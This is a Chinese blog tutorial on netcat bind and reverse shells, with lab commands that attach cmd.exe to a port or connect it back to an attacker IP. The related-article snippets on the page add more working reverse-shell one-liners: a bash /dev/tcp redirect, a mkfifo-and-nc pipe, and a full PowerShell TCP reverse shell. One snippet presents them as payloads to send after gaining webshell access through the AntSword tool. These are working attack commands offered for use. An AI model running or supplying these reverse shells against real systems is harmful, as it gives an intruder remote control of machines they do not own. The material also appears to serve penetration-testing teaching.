反弹shell的方式——之NC反弹shell

已于 2024-07-24 21:26:14 修改
阅读量858 收藏 4
点赞数 5
CC 4.0 BY-SA版权
分类专栏: 网络安全 文章标签: 网络安全
于 2024-07-24 21:24:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/aihua002/article/details/140673667

反弹shell是指在攻击机监听某个端口,然后通过目标连接攻击机监听的端口,在攻击机反弹得到目标机的shell。通常在目标网络有防火墙或者其他因素限制,导致无法持续控制目标,或者执行命令受阻等情况时需要进行反弹shell

常见的反弹shell方式:

  1. bash反弹shell

  2. NC反弹shell

  3. python反弹shell

  4. ....

NC反弹shell

Netcat简称NC是一个简单可靠的网络工具,被誉为网络界的瑞士军刀。通过NC可以进行端口扫描,反弹shell,

端口监听和文件传输等操作,常用参数如下:

NC反弹shell-正向反弹D

实验拓扑如下图:

攻击机可以和靶机相互访问,这个时候可以使用正向shell

1.在靶机上运行:

nc -lvvp 1111 -e C://Windows\System32\cmd.exe

2.在攻击机上运行:

nc 172.25.254.156 1111

正向shell:攻击者连接到目标系统的监听端口。

NC反弹shell-反向反弹

实验拓扑如下图:

攻击机不可以直接访问靶机,但是靶机可以访问攻击者机器,这个时候可以使用反向shell

1.在攻击机上运行:

nc -lvvp 1111

2.在靶机上运行:

nc -e  C://Windows\System32\cmd.exe 10.100.24.5 1111

反向shell:目标系统连接到攻击者的监听端口。

常见工具 nc Wireshark反弹shell
代码审计
04-20 1542
常⽤⼯具 • 经常使⽤且功能强⼤ • 安全从业者必不可少的帮⼿ • Nc / ncat • Wireshark • Tcpdump nc -lvp 使用nc 监听特定的端口 nc -nv ip port 连接特定ip下的指定端口 NETCAT ——NC • ⺴络⼯具中的瑞⼠军⼑——⼩⾝材、⼤智慧 • 侦听模式 / 传输模式 • telnet / 获取banner信息 • 传输⽂本信息 • 传输⽂件/⺫录 • 加密传输⽂件 • 远程控制/⽊⻢ • 加密所有流量 • 流媒体服务器 • 远程克隆硬盘 root@
内网渗透之——内网转发(反弹shell、端口、代理)
wsnbbz的博客
04-03 1万+
目的 渗透测试中,我们往往会面对十分复杂的内网环境,比如最常用的防火墙,它会限制特定端口的数据包出入。 需要转发的情况 1.A可以访问B的80端口,但是不能访问B的3389端口。 2.A可以访问B,B可以访问C,但是A不可以访问C,需要通过B转发数据,让A和C进行通信。 代理方式 正向代理 正向代理是客户端主动访问服务器的端口 我们常说的代理就是指正向代理,正向代理的过程,它...
Linux下NC反弹shell命令(推荐)
09-15
主要介绍了Linux下NC反弹shell命令,非常不错,具有参考借鉴价值,需要的的朋友参考下吧
NC反弹shell
Palpitate_LL的博客
09-13 1001
c 指定连接后要执行的shell命令-e 指定连接后要执行的文件名-l 监听模式-p 设置本地使用的通信端口-u 使用UDP传输协议,默认是TCP-v 显示命令执行过程,使用-vv显示更详细信息。
反弹 Shell(Reverse Shell)原理与实战详解
最新发布
chaoqun3的博客
06-02 1352
反弹 Shell 是指被控主机主动向攻击者主机发起连接请求,建立一个 TCP 或 UDP 连接后,攻击者可以通过这个连接执行命令并获取输出结果,从而实现远程控制。Netcat 被称为“网络瑞士军刀”,是一款强大的网络调试和数据传输工具。它可以用于创建 TCP/UDP 连接、监听端口、发送文件等。在被控机器上启动一个交互式 shell;将其所有输出(stdout 和 stderr)发送给攻击者;将攻击者作为输入源(stdin),实现远程控制。核心要点描述反弹 Shell 的本质。
nc--反弹shell
wzhua的博客
08-04 3238
nc--反弹shell,小实验
利用NC反弹shell
Chales123的博客
01-17 551
正常情况下shell只能由主机的用户使用,但是反弹shell的目的则是将自己的shell反弹给别的主机,让别的主机可以通过shell来控制自己。举例:假设我们攻击了一台主机,打开了该主机的一个端口,攻击者在自己的主机上去连接目标机器(目标ip:目标机器端口),这是比较常规的方式,叫做正向连接。4.对于病毒、木马,受害者什么时候能中招、对方的网络环境是什么样的、什么时候开关机等情况都是未知的,所以建立一个服务端让恶意程序主动连接,才是最好的办法。2.目标主机的ip是动态改变的,不能持续控制。
nc的使用+反弹shell
2301_80366980的博客
02-18 1613
记录学习linux中nc的使用,以及反弹shell仅供个人学习,如有冒犯请尽快联系。
[保姆级教程]-通过NC反弹shell实战
qq_43681532的博客
02-19 411
环境工具步骤。
NC反弹Shell
qq_23066945的博客
11-23 737
NC反弹Shell 实验环境 Kali Ubuntu(开启telnet) 一、Msf登录设置 1、保证kali使用telnet能够登陆Ubuntu(假设通过爆破,弱口令成功登录telnet) 使用telnet登录模块 设置目标ip(Ubuntu),用户名,密码(可以指定密码文件)run运行 可以看到,成功登录telnet,记录会话 选择第一个会话进行连接 然后下载事先准备好的文件123...
内网转发——反弹shell
cxrpty的博客
03-16 1183
内网转发的目的: 渗透测试中,我们往往会面对十分复杂的内网环境,比如最常用的防火墙,它会限制特定端口的数据包出入。 代理方式: 正向代理:正向代理是服务器开放端口,客户端主动访问服务器的端口。正向代理的过程是它隐藏了真实的请求客户端,服务端不知道真实的客户端是谁,客户端请求的服务都被代理服务器代替来请求。 反向代理:反向代理是客户端开发端口,服务器连接客户端。反向代理是相对于服务...
详解NC反弹shell的几种方法
01-08
假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu、CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1:bash反弹 bash -i >& /dev/tcp/ip/port 0>&1 但首先需要在kali上使用
nc.exe(nc反弹)
04-07
netcat被誉为网络安全界的‘瑞士军刀’,相信没有什么人不认识它吧...... 一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。 在中国,它的WINDOWS版有两个版本,一个是原创者Chris Wysopal写的原版本,另一个是由‘红与黑’编译后的新‘浓缩’版。‘浓缩’版的主程序只有10多KB(10多KB的NC是不能完成下面所说的第4、第5种使用方法,有此功能的原版NC好象要60KB:P),虽然“体积”小,但很完成很多工作。
2024年运维最新【安全知识】——LInux的shell反弹姿势合集(更新中,【工作感悟】
m0_55030688的博客
05-04 678
bash -i 打开一个交互的bash& 将标准错误输出重定向到标准输出/dev/tcp/x.x.x.x/port 意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port为端口0>&1 标准输入重定向到标准输出,实现你与反弹出来的shell的交互。
NC(瑞士军刀)反弹shell使用教程,实操演示,保姆级教学
2301_79015613的博客
03-14 2234
简介:nc瑞士军刀,通常被称为netcat或简称nc,是一个被誉为网络安全界的“瑞士军刀”的实用工具。它利用TCP或UDP协议的网络连接来读写数据,具有多种强大的功能,使用也相对简单,只需两台装有nc的PC,就可以进行各种网络操作。例如,通过监听特定端口,可以实现电子取证PC与电子取证设备之间的通信和数据同步。下面是nc的常用参数。
Windows/Linux 下nc 反弹shell
热门推荐
SoulCat
06-11 1万+
*Windows/Linux 下nc 反弹shell 高二那年班主任对我们说:其实我并不反对你们谈恋爱, 只是你们记得要找一个有担当的, 那些一看见老师就松开你手的,要来有什么用? NC概述: nc又名netcat,一个简单而有用的工具,可以干很多事情,但是不可以吃。 何为反弹shell?为什么不反弹攻击? 相信你有一天可以直接把所有攻击反弹回去的. 何为反弹shell? 简单来说就...
nc反弹shell的使用
qq_42307546的博客
03-29 2163
交互shell就是shell等待你的输入,并且立即执行你提交的命令。 这种模式被称作交互式是shell与用户进行交互,用户输入退出命令才会终止 例如 cmd终端 msf反弹 非交互shell也可以运行在另一种模式,非交互模式,这种模式是直接读取存放在文件中的命令并且运行,当他读取到文件末尾就会终止 例如:webshell,这种执行完命令之后就会终止掉了 使用反弹shell可以让目标服务器主动连接攻击者,绕过防火墙的拦截,因为防火墙只会拦截外部访问内部的流量并不会主动拦截内部发出的流量 利用nc反弹shell
NC反弹shell的几种方法
qq_59350385的博客
05-12 1万+
假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu、CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1:bash
蚁剑中使用nc反弹shell权限
02-19
### 蚁剑使用 `nc` 反弹 Shell 权限方法 #### 准备工作 为了实现通过蚁剑利用 `nc` 进行反弹Shell的操作,需要确保攻击机已经安装并配置好了NetCat (nc),并且能够正常运行。同时,在目标主机上也需要具备执行命令的能力。 #### 创建监听端口 在攻击者的机器上启动一个监听服务等待来自受害者的连接请求: ```bash nc -lvnp 4444 ``` 这条指令会在本地开启一个TCP监听器,其中 `-l` 表示监听模式;`-v` 提供详细的输出信息;`-n` 不解析DNS名称;而 `-p` 后面跟的是指定要监听的端口号[^1]。 #### 配置蚁剑客户端 打开蚁剑软件,新建项目后选择合适的协议类型(如HTTP(S)),设置好相应的参数之后保存项目文件。接着切换到“终端”选项卡准备发送反弹shell所需的payload给服务器端。 #### 发送反弹Shell Payload 假设当前已获得WebShell访问权限,则可以在蚁剑控制台里输入如下命令来触发反弹Shell行为: 对于Linux系统: ```bash rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.x.x 4444 >/tmp/f ``` 这里 `/bin/sh` 是指调用系统的Bourne shell解释程序创建交互式的子进程环境,并将其标准输入输出重定向到由 `nc` 建立起来的数据流管道中去[^3]。 而对于Windows平台则可以采用PowerShell方式来进行类似的处理: ```powershell $client = New-Object System.Net.Sockets.TCPClient('192.168.x.x',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (Invoke-Expression $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendByte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendByte,0,$sendByte.Length);$stream.Flush()};$client.Close() ``` 这段脚本实现了与上述Linux版本相同的功能——即建立反向连接并将cmd.exe的标准输入输出绑定到了网络套接字之上[^4]。 一旦成功建立了这种双向通信机制,就可以像操作自己的电脑那样自由操控远端设备了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值